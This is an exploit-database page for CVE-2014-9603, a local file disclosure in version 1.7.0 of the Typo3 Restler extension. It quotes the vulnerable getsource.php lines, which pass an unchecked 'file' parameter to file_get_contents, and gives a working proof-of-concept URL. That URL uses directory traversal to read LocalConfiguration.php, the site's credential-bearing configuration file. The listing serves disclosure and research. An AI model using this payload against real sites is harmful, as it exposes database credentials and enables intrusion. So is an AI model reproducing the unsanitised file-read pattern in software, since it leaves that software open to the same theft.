Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2014-9603 | CWE-22 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2017-10-14 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 0.02192 | 0.50148 |
# Exploit Title: Typo3 Restler Extension - Local File Disclosure # Date: 2017-10-13 # Exploit Author: CrashBandicot @dosperl # Vendor Homepage: https://www.aoe.com/ # Software Link: https://extensions.typo3.org/extension/restler/ # Tested on : MsWin # Version: 1.7.0 (last) # Vulnerability File : getsource.php 3. $file = $_GET['file']; 13. $text = file_get_contents($file); 16. die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>"); # PoC : # http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php # https://i.imgur.com/zObmaDD.png # Timeline : # Vulnerability identified # Vendor notified # CVE number requested # Exploit released
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.